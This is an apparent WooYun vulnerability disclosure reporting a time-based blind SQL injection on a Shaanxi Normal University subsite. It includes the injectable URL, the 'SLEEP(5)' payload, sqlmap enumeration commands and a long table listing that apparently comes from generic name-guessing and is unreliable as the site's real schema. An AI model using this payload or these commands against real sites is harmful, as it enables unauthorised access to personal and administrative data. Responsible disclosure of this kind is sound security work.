当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061071

漏洞标题:陕西师范大学某分站SQL注入

相关厂商:陕西师范大学

漏洞作者: 从容

提交时间:2014-05-19 11:31

修复时间:2014-07-03 11:32

公开时间:2014-07-03 11:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-19: 细节已通知厂商并且等待厂商处理中
2014-05-23: 厂商已经确认,细节仅向厂商公开
2014-06-02: 细节向核心白帽子及相关领域专家公开
2014-06-12: 细节向普通白帽子公开
2014-06-22: 细节向实习白帽子公开
2014-07-03: 细节向公众公开

简要描述:

陕西师范大学某分站#&MySQL注入导致数据库大量重要信息泄露
涉及管理用户IP、学生数据、server信息、配置文件信息等等好多好多,光是跑表就跑了一个多小时- -.
主站:
http://www.snnu.edu.cn/

详细说明:

MySql注入点:

http://xiaobao.snnu.edu.cn/bencandy.php?id=965


---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=965' AND SLEEP(5) AND 'TCGQ'='TCGQ
---

漏洞证明:

#1、获取数据库:

./sqlmap.py -u "http://xiaobao.snnu.edu.cn/bencandy.php?id=965" --dbs


available databases [1]:
[*] xiaocao


#2、获取表段:

./sqlmap.py -u "http://xiaobao.snnu.edu.cn/bencandy.php?id=965" -D xiaocao --tables


+-------------------------------------------------+
| neuf |
| new |
| news_lostpass |
| nguoidungs |
| nodes |
| noms |
| not_null_test |
| notafiscal |
| notafiscal_deducao |
| notafiscal_itemnotafiscal |
| notizen |
| nuke_banner_plans |
| nuke_banner_positions |
| nuke_bbauth_access |
| nuke_bbbanlist |
| nuke_bbcategories |
| nuke_bbdisallow |
| nuke_bbforum_prune |
| nuke_bbposts_text |
| nuke_bbsessions |
| nuke_bbthemes_name |
| nuke_bbtopics_watch |
| nuke_bbuser_group |
| nuke_blocks |
| nuke_comments |
| nuke_counter |
| nuke_downloads_downloads |
| nuke_downloads_editorials |
| nuke_faqanswer |
| nuke_faqcategories |
| nuke_gallery_media_types |
| nuke_gallery_rate_check |
| nuke_gallery_template_types |
| nuke_groups |
| nuke_journal |
| nuke_journal_comments |
| nuke_journal_stats |
| nuke_links_editorials |
| nuke_links_links |
| nuke_links_newlink |
| nuke_main |
| nuke_modules |
| nuke_pages |
| nuke_pages_categories |
| nuke_pollcomments |
| nuke_popsettings |
| nuke_referer |
| nuke_reviews_main |
| nuke_stories_cat |
| nuke_subscriptions |
| nuke_topics |
| nuked_page |
| nulltest |
| object |
| object_link |
| object_types |
| oc |
| oe |
| offers |
| oidtest |
| oil_bannertrack |
| oil_bfsurvey_pro_categories |
| oil_bfsurveypro_35 |
| oil_biolmed_blocks |
| oil_biolmed_entity |
| oil_biolmed_entity_types |
| oil_biolmed_measurements |
| oil_biolmed_thesis |
| oil_categories |
| oil_contact_details |
| oil_content |
| oil_content_rating |
| oil_core_acl_aro |
| oil_core_acl_aro_sections |
| oil_dbcache |
| oil_groups |
| oil_jf_tableinfo |
| oil_languages |
| oil_messages |
| oil_messages_cfg |
| oil_migration_backlinks |
| oil_modules |
| oil_modules_menu |
| oil_newsfeeds |
| oil_phocadownload |
| oil_phocadownload_sections |
| oil_phocadownload_user_stat |
| oil_phocagallery_categories |
| oil_phocagallery_comments |
| oil_phocagallery_img_votes_statistics |
| oil_phocagallery_votes |
| oil_poll_data |
| oil_poll_date |
| oil_poll_menu |
| oil_rokdownloads |
| oil_rokversions |
| oil_templates_menu |
| operation |
| orderitems |
| organizations |
| osc_categories_description |
| osc_manufacturers_info |
| osc_products_images |
| osc_products_options_values |
| osc_products_options_values_to_products_options |
| outdoor_spaces |
| p0fs |
| page_log_exclusion |
| page_restrictions |
| papel |
| part |
| partenaire |
| participate |
| partscustomer |
| partsvendor |
| pass |
| passe |
| passes |
| passw |
| passwd |
| pay_melodies |
| payment |
| payments |
| perdorues |
| permission |
| person |
| personal |
| personne |
| personnel |
| pessoa_telefone |
| pg_ts_cfgmap |
| phones |
| phorum_user |
| phorum_users |
| photo |
| phpads_clients |
| phpbb_categories |
| phpbb_config |
| phpbb_confirm |
| phpbb_forum_prune |
| phpbb_groups |
| phpbb_posts_text |
| phpbb_privmsgs |
| phpbb_privmsgs_text |
| phpbb_search_wordlist |
| phpbb_topics |
| phpbb_topics_watch |
| phpbb_user_group |
| phpbb_vote_results |
| phpshop_categories |
| phpshop_links |
| phpshop_news |
| phpshop_opros |
| plugin |
| pma_bookmark |
| pma_pdf_pages |
| pma_tracking |
| po_seq |
| pokes |
| pools |
| portal_access |
| portale |
| power |
| pricegroup |
| primarytest2 |
| principal |
| priorities |
| problem |
| procedure_data_set |
| processo |
| procs_priv |
| product |
| product_colour_multi |
| product_font |
| product_price |
| product_size_multi |
| production_multiple |
| products |
| produtos |
| profession1 |
| profile_pictures |
| project_user_xref |
| projeto |
| promotion |
| protocol_action |
| province |
| psw |
| pswd |
| publicusers |
| publisher |
| pw |
| pw_announce |
| pw_banuser |
| pw_favors |
| pw_membercredit |
| pw_members |
| pw_msg |
| pw_schcache |
| pw_styles |
| pw_threads |
| pw_usergroups |
| pw_wordfb |
| pwd |
| pwd1 |
| pword |
| pwrd |
| qrtz_blob_triggers |
| qrtz_triggers |
| quanly |
| querycache |
| questions |
| radacct |
| rating_track |
| reciprocal_links |
| redirect |
| ref |
| reg |
| register |
| registeration |
| registriert |
| reglement |
| regusers |
| rel_person_topic |
| relation_members |
| report |
| resource_types |
| result |
| riddles |
| rights |
| rooms |
| roster |
| rss_read |
| ruletest |
| ruolo |
| sailors |
| salariedEmployees |
| salgrade |
| sazog_urtiertoba_ge |
| sb_host_admin |
| sb_host_adminAffichage1 |
| sbreciprocal_cats |
| school |
| sconfig |
| scripts |
| sea |
| seite_abschnitt |
| seite_layout |
| sendmsgs |
| sent_mails |
| server |
| servers |
| service_request_log |
| services_links |
| setup_ |
| sf_guard_user_group |
| sga_xplan_test |
| shared_secrets |
| sic |
| sidebar |
| singin |
| siteIndexTable |
| site_climatic |
| site_environment |
| site_iwis |
| site_stats |
| situacaoitem |
| size |
| software_licenses |
| softwares |
| solicitacao |
| solicitacaosenha |
| soraldo_ele_tipo |
| sort |
| special_category |
| specialty |
| spip_breves |
| spip_caches |
| spip_index_dico |
| spip_mots_articles |
| spip_mots_forum |
| spip_ortho_dico |
| spip_rubriques |
| spip_signatures |
| spip_versions |
| spip_visites_articles |
| sporti_ge |
| spt_datatype_info |
| spt_datatype_info_ext |
| spt_provider_types |
| staff |
| staff_db |
| standort |
| stars |
| statistiques |
| statuses |
| stellen |
| store1 |
| store2 |
| students |
| study_user |
| stuseres |
| stusers |
| subject |
| subscriber |
| synchro_element |
| synchro_type |
| sys |
| sys_acl_actions |
| sys_acl_matrix |
| sys_options_cats |
| sysadmins |
| sysmaps_hosts |
| sysmaps_links |
| syssegments |
| systime |
| t1 |
| t_peep |
| table_user |
| tables |
| taikhoan |
| taikhoanquantri |
| tamio |
| taxonomy |
| tb_account |
| tb_accounts |
| tb_administrator |
| tb_admins |
| tb_login |
| tb_logins |
| tb_members |
| tb_nguoidung |
| tb_nguoidungs |
| tb_usernames |
| tb_users |
| tbaccount |
| tbaccounts |
| tbadmins |
| tblArtistCategory |
| tblConfigs |
| tblLogBookAuthor |
| tblLogBookEntry |
| tblLogBookImages |
| tblLogBookImport |
| tblNews |
| tblOrders |
| tblRestrictedPasswords |
| tbl_accounts |
| tbl_admin |
| tbl_categories |
| tbl_client |
| tbl_event |
| tbl_member |
| tbl_members |
| tbl_state |
| tbl_tech |
| tbl_useraccounts |
| tbl_works |
| tblaccount |
| tbladmin |
| tblblogcomments |
| tblblogentriesrelated |
| tblblogroles |
| tblblogsubscribers |
| tblclient |
| tblclients |
| tbllogin |
| tbllogins |
| tblnguoidungs |
| tblogins |
| tblproduct |
| tblservers |
| tblusers |
| tbnguoidung |
| tbuseraccount |
| tbuseraccounts |
| tbusers |
| telecharger |
| telefone |
| telefono |
| telephone |
| templatelinks |
| term |
| test |
| test_user |
| test_users |
| tests |
| tf_log |
| tf_messages |
| tf_rss |
| the |
| theday |
| tickers |
| time_zone_transition_type |
| tipo_bolsa |
| topicpublication |
| trackbacks |
| traffic_selectors |
| transcache |
| transfers |
| translation |
| trigger_depends |
| tt_content |
| type |
| typeFacture |
| typecompte |
| un |
| uname |
| uniquetest |
| uplebata_dacva_ge |
| upload |
| uploads |
| us |
| userInfo |
| user_admin |
| user_connection |
| user_defined_attribute |
| user_id |
| user_login |
| user_logins |
| user_names |
| user_newtalk |
| user_password |
| user_pword |
| user_test |
| user_un |
| user_usern |
| userid |
| userlistuser_list |
| usern |
| usernm |
| userpwd |
| userrights |
| users_test |
| usertbl |
| usr |
| usr2 |
| usrnam |
| usrname |
| usrs |
| usuario |
| utente |
| utenti |
| uvw_Pref |
| vcd_MediaTypes |
| vcd_MovieCategories |
| vcd_PornStudios |
| vcd_Pornstars |
| vcd_PropertiesToUser |
| vcd_Screenshots |
| vcd_UserWishList |
| vcd_VcdToPornCategories |
| vendedores |
| vendor_types |
| vendortax |
| venues |
| veranstalter |
| verwaltet |
| viewLogBookEntry |
| views_track |
| vip |
| visual |
| voraussetzen |
| vrls_listing_images |
| vrls_listings |
| vrls_xref_country |
| vwListAllAvailable |
| webadmins |
| webcal_asst |
| webcal_entry_repeats_not |
| webcal_group |
| webcal_group_user |
| webcal_report |
| webcal_report_template |
| webcal_user |
| webmasters |
| wh_man_children |
| win |
| works_on |
| wp1_categories |
| wp1_comments |
| wp_comments |
| wp_links |
| wp_options |
| wp_pod_fields |
| wp_post2cat |
| wp_postmeta |
| wp_posts |
| wp_term_taxonomy |
| xar_roles |
| yabbse_settings |
| yearend |
| yhm |
| zahlung_weitere |
| zipcodes |
| zl_advertisement |
| zl_article |
| zl_baoming |
| zl_deeds |
| zl_finance |
| zl_media |
| zoph_people |
| zutat |
+-------------------------------------------------+
表段太多,就不全列出来了- -.


字段更是多的要命- -.
就不一一展示了- -.

修复方案:

:)

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-05-23 14:45

厂商回复:

已通知相关学校处理

最新状态:

暂无


漏洞评价:

评论